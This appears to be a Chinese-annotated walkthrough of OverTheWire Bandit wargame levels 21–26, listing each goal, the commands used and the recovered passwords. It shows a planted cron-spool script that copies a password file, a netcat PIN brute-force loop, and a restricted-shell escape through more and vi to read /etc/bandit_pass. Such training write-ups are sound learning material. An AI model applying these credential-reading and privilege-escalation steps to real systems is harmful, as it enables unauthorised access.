Bandit Level 21 → Level 22
Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
知识点:
cron相关。参考https://baike.so.com/doc/1746392-1846378.html
操作:
cat /etc/cron.d/cronjob_bandit22
cat /usr/bin/cronjob_bandit22.sh
cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
密码:Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
Bandit Level 22 → Level 23
Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.
知识点:
读懂shell脚本
操作:
echo I am user bandit23 | md5sum | cut -d ' ' -f 1
cat /tmp/8ca319486bfbbc3663ea0fbe81326349
密码:jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
Bandit Level 23 → Level 24
Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
知识点:
读写shell脚本。
操作:
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
owner="$(stat --format "%U" ./$i)"
if [ "${owner}" = "bandit23" ]; then
timeout -s 9 60 ./$i
fi
rm -f ./$i
fi
done
编写shell脚本:
mkdir /tmp/bandit23/
vi 1.sh
!/bin/bash
cat /etc/bandit_pass/bandit24 >> /tmp/bandit23/pass
chmod 777 1.sh
touch pass
chmod 777 pass
cp shell.sh /var/spool/bandit24/
当前目录下等待即可
密码:UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
Bandit Level 24 → Level 25
Level Goal
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
知识点:
暴力破解
操作:
1.先用nc连接一下,查看要求输入的匹配格式,为写shell脚本制作密码字典作基础
bandit24@bandit:~$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
^C
2.写shell脚本制作密码字典
#!/bin/bash
for ((i=0;i<10000;i++));
do
echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i ">>pass
done
3.暴力破解:
nc localhost 30002 <pass
密码:uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
Bandit Level 25 → Level 26
Level Goal
Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.
知识点:
操作:
bandit25@bandit:~$ cat /etc/passwd| grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh
export TERM=linux
more ~/text.txt
exit 0
把本地shell压缩到6行以下,再进行登录。
登陆后在阻塞的more中按v进入vi编辑页面,再按:进入命令行模式,执行命令r /etc/bandit_pass/bandit26即可得到密码。